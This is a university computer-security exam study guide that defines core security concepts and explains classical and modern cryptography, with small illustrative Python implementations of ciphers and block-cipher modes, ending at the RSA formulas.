Final Exam Study Guide

The three-hour study guide for the final exam

Paul Krzyzanowski

December 2024

Disclaimer: This study guide attempts to touch upon the most important topics that may be covered on the exam but does not claim to necessarily cover everything that one needs to know for the exam. Finally, don't take the three hour time window in the title literally.

Last update: Wed Apr 23 20:05:48 EDT 2025

Introduction

Computer security is about keeping computers, their programs, and the data they manage “safe.” Specifically, this means safeguarding three areas: confidentiality, integrity, and availability. These three are known as the CIA Triad (no relation to the Central Intelligence Agency).

Confidentiality
Confidentiality ensures that information is protected from unauthorized access, allowing only authorized users to view or modify it. Privacy gives individuals control over their personal data, focusing on how it is collected and shared. Privacy is a reason for confidentiality. Someone being able to access a protected file containing your medical records without proper access rights is a violation of confidentiality. Anonymity hides a person’s identity, even if their actions are visible. Secrecy involves the deliberate concealment of information for security or strategic reasons.
A data breach occurs when unauthorized individuals access sensitive data due to hacking, malware, or poor security controls. This can expose personal, financial, or corporate information, leading to identity theft or financial loss. Data exfiltration is the unauthorized transfer of stolen data from a system, often as part of a breach. Attackers use malware, phishing, or compromised credentials to extract information for fraud or sale.
Integrity

Integrity refers to the trustworthiness of a system. This means that everything is as you expect it to be: users are not imposters and processes are running correctly.

  • Data integrity means that the data in a system has not been corrupted.

  • Origin integrity means that the person or system sending a message or creating a file truly is that person and not an imposter. Authentication techniques can address this issue.

  • Recipient integrity means that the person or system receiving a message truly is that person and not an imposter.

  • System integrity means that the entire computing system is working properly; that it has not been damaged or subverted. Processes are running the way they are supposed to.

Maintaining integrity means not just defending against intruders that want to modify a program or masquerade as others but also protecting the system against accidental damage, such as from user or programmer errors.
Availability
Availability means that the system is available for use and performs properly. A denial of service (DoS) attack may not steal data or damage any files but may cause a system to become unresponsive.

Security is difficult. Software is incredibly complex. Large systems may comprise tens or hundreds of millions of lines of code. Systems as a whole are also complex. We may have a mix of cloud and local resources, third-party libraries, and multiple administrators. If security were easy, we would not have massive security breaches year after year. Microsoft wouldn’t have monthly security updates. There are no magic solutions … but there is a lot that can be done to mitigate the risk of attacks and their resultant damage.

We saw that computer security addresses three areas of concern. The design of security systems also has three goals.

Prevention
Prevention means preventing attackers from violating established security policies. It means that we can implement mechanisms into our hardware, operating systems, and application software that users cannot override – either maliciously or accidentally. Examples of prevention include enforcing access control rules for files and authenticating users with passwords.
Detection
Detection detects and reports security attacks. It is particularly important when prevention mechanisms fail. It is useful because it can identify weaknesses with certain prevention mechanisms. Even if prevention mechanisms are successful, detection mechanisms are useful to let you know that attempted attacks are taking place. An example of detection is notifying an administrator that a new user has been added to the system. Another example is being notified that there have been several consecutive unsuccessful attempts to log in.
Recovery
If a system is compromised, we need to stop the attack and repair any damage to ensure that the system can continue to run correctly and the integrity of data is preserved. Recovery includes forensics, the study of identifying what happened and what was damaged so we can fix it. An example of recovery is restoration from backups.

Security engineering involves implementing mechanisms and defining policies to protect a system’s components. Like other engineering disciplines, it requires trade-offs between security and usability. The most secure system would be completely isolated, housed in a shielded room with restricted access, and running fully audited software—but such a setup is impractical for everyday computing. Users need connectivity, mobility, and interaction with the world, which introduces risks. Even in a highly secure environment, concerns remain: monitoring access, verifying software integrity, and preventing insider threats or coercion. Effective security design requires understanding potential attackers and their threats, balancing protection with functionality.

Risk analysis evaluates the likelihood and impact of an attack, identifying who may be affected and the worst possible consequences. A threat model visually maps data flows, highlighting points where information enters, exits, or moves between subsystems. This helps prioritize security efforts by identifying the most vulnerable areas in a system.

Secure systems consist of policies and mechanisms working together to enforce security. A policy defines what is or isn’t allowed, such as requiring users to log in with a password. Mechanisms are the technical implementations that enforce these policies. For example, a login system that prompts for credentials, verifies them against stored records, and grants access only if authentication succeeds ensures that the policy is followed. Effective security requires both well-defined policies and robust mechanisms to enforce them.

Key Cybersecurity Concepts

Understanding how attacks occur requires familiarity with key terms that describe weaknesses, threats, and attack methods. The following definitions explain fundamental concepts related to system security and cyber threats.

Vulnerability

A vulnerability is a weakness in a system, software, or network that can be exploited by an attacker. Vulnerabilities can arise from software bugs, misconfigurations, or weak security practices.

Example: An outdated web server with an unpatched security flaw that allows unauthorized access.

Exploit

An exploit is a technique, tool, or piece of code designed to take advantage of a vulnerability. Exploits can be automated scripts, malware, or sophisticated attack methods used to gain unauthorized access or control over a system.

Example: A hacker uses a known buffer overflow exploit to crash a system and execute malicious code.

Attack

An attack is a deliberate attempt to compromise a system’s security, often with the goal of stealing data, disrupting services, or gaining unauthorized control. Attacks can be carried out manually by skilled hackers or through automated tools.

Example: A phishing attack that tricks users into revealing their login credentials.

Attack Vector

An attack vector is the method or pathway an attacker uses to deliver an exploit and gain access to a system. Attack vectors can be technical (such as software vulnerabilities) or social (such as phishing).

Example: A malicious email attachment that installs malware when opened.

Attack Surface

An attack surface represents the total number of possible entry points that an attacker can target. A larger attack surface increases the risk of security breaches, as more vulnerabilities may be exposed.

Example: A company’s attack surface includes its public website, employee email accounts, remote access systems, and IoT devices.

Threat

A threat is any potential danger that could exploit a vulnerability to cause harm. Threats can originate from malicious actors, software bugs, or natural disasters that disrupt security.

Example: A ransomware threat that encrypts critical files and demands payment for their release.

Threat Actor

A threat actor is the entity responsible for carrying out an attack. Threat actors include hackers, cybercriminal groups, nation-state attackers, and even insiders with malicious intent.

Example: The Lazarus Group, a North Korean cyber-espionage team responsible for various high-profile attacks.

Threat categories

Threats fall into four broad categories:

Disclosure: Unauthorized access to data, which covers exposure, interception, interference, and intrusion. This includes stealing data, improperly making data available to others, or snooping on the flow of data.

Deception: Accepting false data as true. This includes masquerading, which is posing as an authorized entity; substitution or insertion, which is the injection of false data or the modification of existing data; and repudiation, where someone falsely denies receiving or originating data.

Disruption: Some change that interrupts or prevents the correct operation of the system. This can include maliciously changing the logic of a program, a human error that disables a system, an electrical outage, or a failure in the system due to a bug. It can also refer to any obstruction that hinders the functioning of the system.

Usurpation: Unauthorized control of some part of a system. This includes theft of service as well as any misuse of the system such as tampering or actions that result in the violation of system privileges.

Network threats

The Internet increases opportunities for attackers. The core protocols of the Internet were designed with decentralization, openness, and interoperability in mind rather than security. Anyone can join the Internet and send messages … and untrustworthy entities can provide routing services. It allows bad actors to hide and to attack from a distance. It also allows attackers to amass asymmetric force: harnessing more resources to attack than the victim has for defense. Even small groups of attackers are capable of mounting Distributed Denial of Service (DDoS) attacks that can overwhelm large companies or government agencies by assembling a botnet of tens or hundreds of thousands of compromised computers.

Threat actors

Adversaries can range from lone hackers to industrial spies, terrorists, and intelligence agencies. We can consider two dimensions: skill and focus.

Regarding focus, attacks are either opportunistic or targeted.

Opportunistic attacks are those where the attacker is not out to get you specifically but casts a wide net, trying many systems in the hope of finding a few that have a particular vulnerability that can be exploited. Targeted attacks are those where the attacker targets you specifically.

In the dimension of skill, the term script kiddies is used to refer to attackers who lack the skills to craft their own exploits but download malware toolkits to try to find vulnerabilities (e.g., systems with poor or default passwords, hackable cameras). They can still cause substantial damage.

Advanced persistent threats (APT) are highly-skilled, well-funded, and determined (hence, persistent) attackers. They can craft their own exploits, pay millions of dollars for others, and may carry out complex, multi-stage attacks.

Trusted computing base

The Trusted Computing Base (TCB) consists of the hardware, software, and firmware that enforce a system’s security policies. If the TCB is compromised, you lose assurance that any part of the system remains secure. For example, if an attacker modifies the operating system to ignore file access permissions, applications running on the system can no longer be trusted to enforce security rules. A compromised TCB can allow unauthorized access, privilege escalation, or persistent backdoors, making security controls ineffective.

The computing supply chain is crucial to TCB security, as modern systems rely on globally sourced and third-party components – both hardware and software. A compromised supply chain—whether through malicious firmware, counterfeit hardware, or backdoored software—can introduce vulnerabilities before a system is even deployed. Examples include the SolarWinds breach and hardware-level implants, which demonstrated how attackers can infiltrate systems at a fundamental level. If an attacker compromises the supply chain, even secure software running on top of the system cannot be trusted. To prevent such risks, organizations implement secure sourcing, vendor audits, firmware integrity checks, and hardware attestation to ensure the trustworthiness of the computing infrastructure.

Cryptography

Cryptography deals with encrypting plaintext using a cipher, also known as an encryption algorithm, to create ciphertext, which is unintelligible to anyone unless they can decrypt the ciphertext. It is a tool that helps build protocols that address:

Authentication:
Showing that the user really is that user.
Integrity:
Validating that the message has not been modified.
Nonrepudiation:
Binding the origin of a message to a user so that she cannot deny creating it.
Confidentiality:
Hiding the contents of a message.

A secret cipher is one where the workings of the cipher must be kept secret. There is no reliance on any key and the secrecy of the cipher is crucial to the value of the algorithm. This has obvious flaws: people in the know leaking the secret, designers coming up with a poor algorithm, and reverse engineering. Schneier’s Law (not a real law), named after Bruce Schneier, a cryptographer and security professional, suggests that anyone can invent a cipher that they will not be able to break, but that doesn’t mean it’s a good one.

For any serious use of encryption, we use well-tested, non-secret algorithms that rely on secret keys. A key is a parameter to a cipher that alters the resulting ciphertext. Knowledge of the key is needed to decrypt the ciphertext. Kerckhoffs’s Principle states that a cryptosystem should be secure even if everything about the system, except the key, is public knowledge. We expect algorithms to be publicly known and all security to rest entirely on the secrecy of the key.

A symmetric encryption algorithm uses the same secret key for encryption and decryption.

An alternative to symmetric ciphers are asymmetric ciphers. An asymmetric, or public key cipher uses two related keys. Data encrypted with one key can only be decrypted with the other key.

Properties of good ciphers

These are the key properties we expect for a cipher to be strong:

  1. For a cipher to be considered good, ciphertext should be indistinguishable from random values.
  2. Given ciphertext, there should be no way to extract the original plaintext or the key that was used to create it except by enumerating over all possible keys. This is called a brute-force attack.
  3. The keys used for encryption should be large enough that a brute force attack is not feasible. Each additional bit in a key doubles the number of possible keys and hence doubles the search time.

Stating that the ciphertext should be indistinguishable from random values implies high entropy. Shannon entropy measures the randomness in a system. It quantifies the unpredictability of cryptographic keys and messages, with higher entropy indicating more randomness. Low entropy would allow an attacker to find patterns or some correlation to the original content.
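
As a rough sketch of the idea, Shannon entropy over the bytes of a message can be computed in a few lines of Python. This is illustrative only; a single entropy estimate is not a full randomness test:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: H = -sum(p * log2(p)) over byte frequencies."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

print(shannon_entropy(b"aaaaaaaa"))        # 0.0: one symbol, completely predictable
print(shannon_entropy(bytes(range(256))))  # 8.0: all 256 byte values equally likely
```

Good ciphertext should score close to 8 bits per byte; natural-language text scores far lower because some characters are much more common than others.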

We expect these properties for a cipher to be useful:

  1. The secrecy of the cipher should be entirely in the key (Kerckhoffs’s principle) – we expect knowledge of the algorithm to be public.

  2. Encryption and decryption should be efficient: we want to encourage the use of secure cryptography where it is needed and not have people avoid it because it slows down data access.

  3. Keys and algorithms should be as simple as possible and operate on any data:

    • There shouldn’t be restrictions on the values of keys, the data that could be encrypted, or how to do the encryption.
    • Restrictions on keys make searches easier and will require longer keys.
    • Complex algorithms will increase the likelihood of implementation errors.
    • Restrictions on what can be encrypted will encourage people to not use the algorithm.
  4. The size of the ciphertext should be the same size as the plaintext.

    • You don’t want your effective bandwidth cut in half because the ciphertext is 2x the size of plaintext.
    • However, sometimes we might need to pad the data but that’s a small number of bytes regardless of the input size.
  5. The algorithm has been extensively analyzed.

    • We don’t want the latest – we want an algorithm that has been studied carefully for years by many experts.

In addition to formulating the measurement of entropy, Claude Shannon posited that a strong cipher should, ideally, have confusion and diffusion as goals in its operation.

Confusion means that there is no direct correlation between a bit of the key and the resulting ciphertext. Every bit of ciphertext will be impacted by multiple bits of the key. An attacker will not be able to find a connection between a bit of the key and a bit of the ciphertext. This is important in not giving the cryptanalyst hints on what certain bits of the key might be, which would limit the set of possible keys. Confusion hides the relationship between the key and the ciphertext.

Diffusion is the property where the plaintext information is spread throughout the cipher so that a change in one bit of plaintext will change, on average, half of the bits in the ciphertext. Diffusion tries to make the relationship between the plaintext and ciphertext as complicated as possible.

Classic cryptography

Monoalphabetic substitution ciphers

The earliest form of cryptography was the monoalphabetic substitution cipher. In this cipher, each character of plaintext is substituted with a character of ciphertext based on a substitution alphabet (a lookup table). The simplest of these is the Caesar cipher, known as a shift cipher, in which a plaintext character is replaced with a character that is n positions away in the alphabet. The key is simply the shift value: the number n. Substitution ciphers are vulnerable to frequency analysis attacks, in which an analyst analyzes letter frequencies in ciphertext and substitutes characters with those that occur with the same frequency in natural language text (e.g., if “x” occurs 12% of the time, it’s likely to really be an “e” since “e” occurs in English text approximately 12% of the time while “x” occurs only 0.1% of the time).
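
A shift cipher reduces to a one-line character rotation. A minimal Python sketch (letters only; everything else passes through unchanged):

```python
def caesar_encrypt(text: str, n: int) -> str:
    """Replace each letter with the one n positions later in the alphabet."""
    result = []
    for ch in text:
        if ch.isalpha():
            base = ord('A') if ch.isupper() else ord('a')
            result.append(chr((ord(ch) - base + n) % 26 + base))
        else:
            result.append(ch)  # leave spaces and punctuation alone
    return ''.join(result)

def caesar_decrypt(text: str, n: int) -> str:
    return caesar_encrypt(text, -n)  # decryption is just a shift in the other direction

ct = caesar_encrypt("ATTACK AT DAWN", 3)
print(ct)                                  # DWWDFN DW GDZQ
assert caesar_decrypt(ct, 3) == "ATTACK AT DAWN"
```

Note how small the key space is: only 25 useful shifts, so even without frequency analysis a brute-force search is trivial.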

Polyalphabetic substitution ciphers

Polyalphabetic substitution ciphers were designed to increase resiliency against frequency analysis attacks. Instead of using a single plaintext to ciphertext mapping for the entire message, the substitution alphabet may change periodically. Leon Battista Alberti is credited with creating the first polyalphabetic substitution cipher. In the Alberti cipher (essentially a secret decoder ring), the substitution alphabet changes every n characters as the ring is rotated one position every n characters.

The Vigenère cipher is a grid of Caesar ciphers that uses a repeating key. A repeating key is a key that repeats itself for as long as the message. Each character of the key determines which Caesar cipher (which row of the grid) will be used for the next character of plaintext. The position of the plaintext character identifies the column of the grid. These algorithms are still vulnerable to frequency analysis attacks but require substantially more plaintext since one needs to deduce the key length (or the frequency at which the substitution alphabet changes) and then effectively decode multiple monoalphabetic substitution ciphers.
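
The grid lookup reduces to a per-character shift selected by the repeating key. A sketch, assuming uppercase A–Z text and key with no spaces:

```python
def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Each key letter selects the Caesar row (shift) applied to the next text letter."""
    sign = -1 if decrypt else 1
    out = []
    for i, ch in enumerate(text):
        shift = ord(key[i % len(key)]) - ord('A')  # the key repeats for the message length
        out.append(chr((ord(ch) - ord('A') + sign * shift) % 26 + ord('A')))
    return ''.join(out)

ct = vigenere("ATTACKATDAWN", "LEMON")
print(ct)                                             # LXFOPVEFRNHR
assert vigenere(ct, "LEMON", decrypt=True) == "ATTACKATDAWN"
```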

One-time Pads

The one-time pad is the only provably secure cipher. It uses a random key that is as long as the plaintext. Each character of plaintext is combined with the corresponding character of the key (e.g., add the characters modulo the size of the alphabet or, in the case of binary data, exclusive-or the next byte of the text with the next byte of the key). The reason this cryptosystem is not particularly useful is because the key has to be as long as the message, so transporting the key securely becomes a problem. The challenge of sending a message securely is now replaced with the challenge of sending the key securely. The position in the key (pad) must be synchronized at all times. Error recovery from unsynchronized keys is not possible. Finally, for the cipher to be secure, a key must be composed of truly random characters, not ones derived by an algorithmic pseudorandom number generator. The key can never be reused.
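
For binary data, the one-time pad is byte-wise exclusive-or with a key as long as the message. A sketch; note that Python’s `secrets` module draws from the operating system’s random generator, which approximates, but does not provably achieve, true randomness:

```python
import secrets

def otp_encrypt(plaintext: bytes) -> tuple[bytes, bytes]:
    """XOR each plaintext byte with a fresh random key byte; returns (ciphertext, key)."""
    key = secrets.token_bytes(len(plaintext))        # key as long as the message; never reuse it
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, key))
    return ciphertext, key

def otp_decrypt(ciphertext: bytes, key: bytes) -> bytes:
    return bytes(c ^ k for c, k in zip(ciphertext, key))  # XOR is its own inverse

ct, key = otp_encrypt(b"meet at noon")
assert otp_decrypt(ct, key) == b"meet at noon"
```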

The one-time pad provides perfect secrecy (not to be confused with forward secrecy, also called perfect forward secrecy, which will be discussed later), which means that the ciphertext conveys no information about the content of the plaintext. It has been proved that perfect secrecy can be achieved only if there are as many possible keys as the plaintext, meaning the key has to be as long as the message.

Stream ciphers

A stream cipher simulates a one-time pad by using a keystream generator to create a set of key bytes that is as long as the message. A keystream generator is a pseudorandom number generator that is seeded, or initialized, with a key that drives the output of all the bytes that the generator spits out. The keystream generator is fully deterministic: the same key will produce the same stream of output bytes each time. Because of this, receivers only need to have the key to be able to decipher a message. However, because the keystream generator does not generate true random numbers, the stream cipher is not a true substitute for a one-time pad. Its strength rests on the strength of the key. A keystream generator will, at some point, reach an internal state that is identical to some previous internal state and produce output that is a repetition of previous output. This also limits the security of a stream cipher, but the repetition may not occur for a long time, so stream ciphers can still be useful for many purposes.
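
The structure can be sketched with a deliberately weak keystream generator. Here a linear congruential PRNG stands in for a real one; an LCG is nowhere near cryptographically secure, but it shows how determinism lets the receiver regenerate the same keystream from the key:

```python
def keystream(key: int):
    """Toy keystream generator: an LCG seeded with the key. Fully deterministic,
    so the same key always yields the same byte stream. NOT secure; illustration only."""
    state = key
    while True:
        state = (state * 1103515245 + 12345) % 2**31
        yield (state >> 16) & 0xFF

def stream_crypt(data: bytes, key: int) -> bytes:
    """XOR data with the keystream; running it twice with the same key decrypts."""
    ks = keystream(key)
    return bytes(b ^ next(ks) for b in data)

ct = stream_crypt(b"simulated one-time pad", key=1234)
assert stream_crypt(ct, key=1234) == b"simulated one-time pad"
```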

Rotor machines

A rotor machine is an electromechanical device that implements a polyalphabetic substitution cipher. It uses a set of disks (rotors), each of which implements a substitution cipher. The rotors rotate with each character in the style of an odometer: after a complete rotation of one rotor, the next rotor advances one position. Each successive character gets a new substitution alphabet applied to it. The multi-rotor mechanism allows for a huge number of substitution alphabets to be employed before they start repeating when the rotors all reach their starting position. The number of alphabets is c^r, where c is the number of characters in the alphabet and r is the number of rotors.

Transposition ciphers

Instead of substituting one character of plaintext for a character of ciphertext, a transposition cipher scrambles the position of the plaintext characters. Decryption requires knowing how to unscramble them.

A scytale, also known as a staff cipher, is an ancient implementation of a transposition cipher where text written along a strip of paper is wrapped around a rod and the resulting sequences of text are read horizontally. This is equivalent to entering characters in a two-dimensional matrix horizontally and reading them vertically. Because the number of characters might not be a multiple of the width of the matrix, extra characters might need to be added at the end. This is called padding and is essential for block ciphers, which encrypt chunks of data at a time.
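
The matrix view translates directly to code. A sketch of a columnar read, where the width plays the role of the rod’s circumference and 'X' is an assumed padding character:

```python
def scytale_encrypt(text: str, width: int, pad: str = "X") -> str:
    """Write text into a grid row by row, then read it out column by column."""
    while len(text) % width:
        text += pad                       # pad so every column has the same height
    rows = len(text) // width
    return ''.join(text[r * width + c] for c in range(width) for r in range(rows))

def scytale_decrypt(ciphertext: str, width: int) -> str:
    rows = len(ciphertext) // width
    return ''.join(ciphertext[c * rows + r] for r in range(rows) for c in range(width))

ct = scytale_encrypt("HELPMEIAMUNDERATTACK", 4)
assert scytale_decrypt(ct, 4) == "HELPMEIAMUNDERATTACK"
```

Because only positions change, the ciphertext contains exactly the same letters as the plaintext, which is why transposition alone offers little secrecy.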

Block ciphers

Most modern ciphers are block ciphers, meaning that they encrypt a chunk of bits, or block, of plaintext at a time. The same key is used to encrypt each successive block of plaintext.

AES and DES are two popular symmetric block ciphers. Symmetric block ciphers are usually implemented as iterative ciphers. The encryption of each block of plaintext iterates over several rounds. Each round uses a subkey, which is a key generated from the main key via a specific set of bit replications, inversions, and transpositions. The subkey is also known as a round key since it is applied to only one round, or iteration. This subkey determines what happens to the block of plaintext as it goes through a substitution-permutation (SP) network. The SP network, guided by the subkey, flips some bits by doing a substitution, which is a table lookup of an input bit pattern to get an output bit pattern, and a permutation, which is a scrambling of bits in a specific order. The output bytes are fed into the next round, which applies a substitution-permutation step with a different subkey. The process continues for several rounds (16 rounds for DES, 10–14 rounds for AES), and the resulting bytes are the ciphertext for the input block.

The iteration through multiple SP steps creates confusion and diffusion. Confusion means that it is extremely difficult to find any correlation between a bit of the ciphertext with any part of the key or the plaintext. A core component of block ciphers is the s-box, which converts n input bits to m output bits, usually via a table lookup. The purpose of the s-box is to add confusion by altering the relationship between the input and output bits.

Diffusion means that any changes to the plaintext are distributed (diffused) throughout the ciphertext so that, on average, half of the bits of the ciphertext would change if even one bit of plaintext is changed.
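
A single substitution-permutation step might be sketched like this. The 4-bit s-box table and the rotate-left permutation below are arbitrary choices for illustration; they are not taken from DES or AES:

```python
# Arbitrary invertible 4-bit s-box: maps each 4-bit input to a 4-bit output.
SBOX = [0xC, 0x5, 0x6, 0xB, 0x9, 0x0, 0xA, 0xD,
        0x3, 0xE, 0xF, 0x8, 0x4, 0x7, 0x1, 0x2]

def permute(byte: int) -> int:
    """Toy bit permutation: rotate the eight bits left by three positions."""
    return ((byte << 3) | (byte >> 5)) & 0xFF

def sp_step(byte: int, subkey: int) -> int:
    """Mix in the subkey, substitute each nibble through the s-box, then permute."""
    byte ^= subkey
    hi, lo = SBOX[byte >> 4], SBOX[byte & 0xF]
    return permute((hi << 4) | lo)

state = 0x3A
for subkey in (0x6C, 0x91, 0x27):   # several rounds, one subkey per round
    state = sp_step(state, subkey)
```

The s-box supplies confusion (the key/input relationship becomes nonlinear) while the permutation spreads each nibble's influence across the block, contributing to diffusion over multiple rounds.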

Feistel ciphers

A Feistel cipher is a form of block cipher that uses a variation of the SP network where a block plaintext is split into two parts. The substitution-permutation round is applied to only one part. That output is then XORed with the other part and the two halves are swapped. At each round, half of the input block remains unchanged. DES, the Data Encryption Standard, is an example of a Feistel cipher. AES, the Advanced Encryption Standard, is not.
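
The split-and-swap structure can be sketched with a toy round function. F below is an arbitrary mixing function, not the one DES uses; the key property on display is that decryption reuses the same network with the subkeys reversed, and F itself never has to be inverted:

```python
MASK32 = (1 << 32) - 1

def F(half: int, subkey: int) -> int:
    """Stand-in round function: any keyed mixing works, since F is never inverted."""
    return ((half * 2654435761) ^ subkey ^ (half >> 5)) & MASK32

def feistel(block: int, subkeys: list[int]) -> int:
    """Run a 64-bit block through the Feistel rounds."""
    L, R = block >> 32, block & MASK32
    for k in subkeys:
        L, R = R, L ^ F(R, k)         # transform one half, XOR into the other, swap
    return (R << 32) | L              # undo the final swap by convention

subkeys = [0xA5A5A5A5, 0x3C3C3C3C, 0x0F0F0F0F, 0x12345678]
ct = feistel(0xDEADBEEFCAFEF00D, subkeys)
pt = feistel(ct, list(reversed(subkeys)))   # decryption: same network, reversed subkeys
assert pt == 0xDEADBEEFCAFEF00D
```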

DES

Two popular symmetric block ciphers are DES, the Data Encryption Standard, and AES, the Advanced Encryption Standard. DES was adopted as a federal standard in 1976 and is a block cipher based on the Feistel cipher that encrypts 64-bit blocks using a 56-bit key.

DES has been shown to have some minor weaknesses against cryptanalysis. The key can be recovered using 2^47 chosen plaintexts or 2^43 known plaintexts. Note that this is not a practical amount of data to get for a real attack. The real weakness of DES is not the algorithm but its 56-bit key. An exhaustive search requires 2^55 iterations on average (we assume that, on average, the plaintext is recovered halfway through the search). This was a lot for computers in the 1970s but is not much of a challenge for today’s dedicated hardware or distributed efforts.

Triple-DES

Triple-DES (3DES) solves the key size problem of DES and allows DES to use keys up to 168 bits. It does this by applying three layers of encryption:

  1. C' = Encrypt M with key K1
  2. C'' = Decrypt C' with key K2
  3. C = Encrypt C'' with key K3

If K1, K2, and K3 are identical, we have the original DES algorithm since the decryption in the second step cancels out the encryption in the first step. If K1 and K3 are the same, we effectively have a 112-bit key and if all three keys are different, we have a 168-bit key.
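The encrypt-decrypt-encrypt layering can be sketched with a stand-in cipher. The toy encrypt/decrypt pair below is just a keyed byte transform, not DES; it only illustrates the EDE structure and the backward-compatibility property when all three keys match:

```python
def toy_encrypt(data: bytes, key: int) -> bytes:
    """Stand-in for DES encryption: keyed XOR followed by an add (NOT a real cipher)."""
    return bytes(((b ^ key) + 1) % 256 for b in data)

def toy_decrypt(data: bytes, key: int) -> bytes:
    """Exact inverse of toy_encrypt."""
    return bytes(((b - 1) % 256) ^ key for b in data)

def triple_encrypt(m: bytes, k1: int, k2: int, k3: int) -> bytes:
    """Encrypt with K1, decrypt with K2, encrypt with K3 (the EDE layering)."""
    return toy_encrypt(toy_decrypt(toy_encrypt(m, k1), k2), k3)

# With all three keys identical, steps 1 and 2 cancel: EDE collapses to one encryption.
assert triple_encrypt(b"block", 7, 7, 7) == toy_encrypt(b"block", 7)
```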

Cryptanalysis is not effective with 3DES: the three layers of encryption use 48 rounds instead of 16 making it infeasible to reconstruct the substitutions and permutations that take place. A 168-bit key is too long for a brute-force attack. However, DES is relatively slow compared with other symmetric ciphers, such as AES. It was designed with hardware encryption in mind. 3DES is, of course, three times slower than DES.

AES

AES, the Advanced Encryption Standard, was designed as a successor to DES and became a federal government standard in 2002. It uses a larger block size than DES: 128 bits versus DES’s 64 bits and supports larger key sizes: 128, 192, and 256 bits. Even a 128-bit key is large enough to make brute-force searches infeasible.

No significant academic attacks have been found thus far beyond brute force search. AES is also typically 5–10 times faster in software than 3DES.

Block cipher modes

Electronic Code Book (ECB)

When data is encrypted with a block cipher, it is broken into blocks and each block is encrypted separately. This leads to two problems.

  1. If different encrypted messages contain the same substrings and use the same key, an intruder can deduce that it is the same data.

  2. Secondly, a malicious party can delete, add, or replace blocks (perhaps with blocks that were captured from previous messages).

This basic form of a block cipher is called an electronic code book (ECB). Think of the code book as a database of encrypted content. You can look up a block of plaintext and find the corresponding ciphertext. This is not feasible to implement for arbitrary messages but refers to the historic use of codebooks to convert plaintext messages to ciphertext.

Cipher Block Chaining (CBC)

Cipher block chaining (CBC) addresses these problems. Every block of data is still encrypted with the same key. However, prior to being encrypted, the data block is exclusive-ORed with the previous block of ciphertext. The receiver does the process in reverse: a block of received data is decrypted and then exclusive-ORed with the previously-received block of ciphertext to obtain the original data. The very first block is exclusive-ORed with a random initialization vector, which must be transmitted to the remote side.

Note that CBC does not make the encryption more secure; it simply makes the result of each block of data dependent on all previous blocks. Because of the random initialization vector, even identical content would appear different in ciphertext. An attacker would not be able to tell if any two blocks of ciphertext refer to identical blocks of plaintext. Because of the chaining, even identical blocks in the same ciphertext will appear vastly different. Moreover, because of this, blocks cannot be meaningfully inserted, swapped, or deleted in the message stream without the decryption failing (producing random-looking garbage).
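
The chaining can be sketched with a toy one-byte block cipher (a keyed add mod 256 standing in for a real cipher). Real CBC uses a random IV; it is fixed here only so the example is deterministic:

```python
def block_enc(b: int, key: int) -> int:
    return (b + key) % 256            # stand-in for a real block cipher

def block_dec(b: int, key: int) -> int:
    return (b - key) % 256

def cbc_encrypt(plaintext: bytes, key: int, iv: int) -> bytes:
    out, prev = [], iv
    for p in plaintext:
        c = block_enc(p ^ prev, key)  # XOR with previous ciphertext block, then encrypt
        out.append(c)
        prev = c
    return bytes(out)

def cbc_decrypt(ciphertext: bytes, key: int, iv: int) -> bytes:
    out, prev = [], iv
    for c in ciphertext:
        out.append(block_dec(c, key) ^ prev)  # decrypt, then XOR with previous ciphertext
        prev = c
    return bytes(out)

ecb = bytes(block_enc(p, 90) for p in b"AAAAAAAA")
cbc = cbc_encrypt(b"AAAAAAAA", key=90, iv=1)
assert len(set(ecb)) == 1             # ECB: identical plaintext blocks repeat in ciphertext
assert len(set(cbc)) > 1              # CBC: chaining hides the repetition
assert cbc_decrypt(cbc, key=90, iv=1) == b"AAAAAAAA"
```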

Counter mode (CTR)

Counter mode (CTR) also addresses these problems but in a different way. The ciphertext of each block is a function of its position in the message. Encryption starts with a message counter. The counter is incremented for each block of input. Only the counter is encrypted. The resulting ciphertext is then exclusive-ORed with the corresponding block of plaintext, producing a block of message ciphertext. To decrypt, the receiver does the same thing and needs to know the starting value of the counter as well as the key.

An advantage of CTR mode is that each block has no dependence on other blocks, and encryption of multiple blocks can be done in parallel.
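
A sketch of counter mode with the same kind of toy one-byte block cipher. Note that the block cipher is only ever run forward: CTR never needs its inverse, and the same function both encrypts and decrypts:

```python
def block_enc(b: int, key: int) -> int:
    return (b * 7 + key) % 256        # stand-in for a real block cipher

def ctr_crypt(data: bytes, key: int, counter: int) -> bytes:
    """Encrypt successive counter values and XOR them with the data blocks."""
    out = []
    for i, b in enumerate(data):
        pad = block_enc((counter + i) % 256, key)  # each pad depends only on position
        out.append(b ^ pad)
    return bytes(out)

ct = ctr_crypt(b"blocks are independent", key=33, counter=5)
assert ctr_crypt(ct, key=33, counter=5) == b"blocks are independent"
```

Because each pad depends only on the counter value and the key, any block can be encrypted or decrypted without touching the others, which is what makes parallel processing possible.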

Cryptanalysis

The goal of cryptanalysis is to break codes. Most often, it is to identify some non-random behavior of an algorithm that will give the analyst an advantage over an exhaustive search of the key space.

Differential cryptanalysis seeks to identify non-random behavior by examining how changes in plaintext input affect changes in the output ciphertext. It tries to find whether certain bit patterns are unlikely for certain keys or whether the change in plaintext results in likely changes in the output.

Linear cryptanalysis tries to create equations that attempt to predict the relationships between ciphertext, plaintext, and the key. An equation will never be equivalent to the cipher, but any correlation of bit patterns gives the analyst an advantage.

Neither of these methods will break a cipher directly, but they may reveal keys or plaintexts that are more likely (or less likely) than others, reducing the number of keys that need to be searched.

Public key cryptography

Public key algorithms, also known as asymmetric ciphers, use one key for encryption and another key for decryption. One of these keys is kept private (known only to the creator) and is known as the private key. The corresponding key is generally made visible to others and is known as the public key.

Anything encrypted with the private key can be decrypted only with the public key. This is the basis for digital signatures. Anything encrypted with the public key can be decrypted only with the corresponding private key. This is the basis for authentication and covert communication.

Public and private keys are related but, given one of the keys, there is no feasible way of computing the other. They are based on trapdoor functions, which are one-way functions: there is no known way to compute the inverse unless you have extra data: the other key.

RSA public key cryptography

The RSA algorithm is the most popular algorithm for asymmetric cryptography. Its security is based on the difficulty of finding the factors of the product of two large prime numbers. Unlike symmetric ciphers, RSA encryption is a matter of performing arithmetic on large numbers. It is also a block cipher and plaintext is converted to ciphertext by the formula:

c = m^e mod n

Where m is a block of plaintext, e is the encryption key, and n is an agreed-upon modulus that is the product of two primes. To decrypt the ciphertext, you need the decryption key, d:

m = c^d mod n

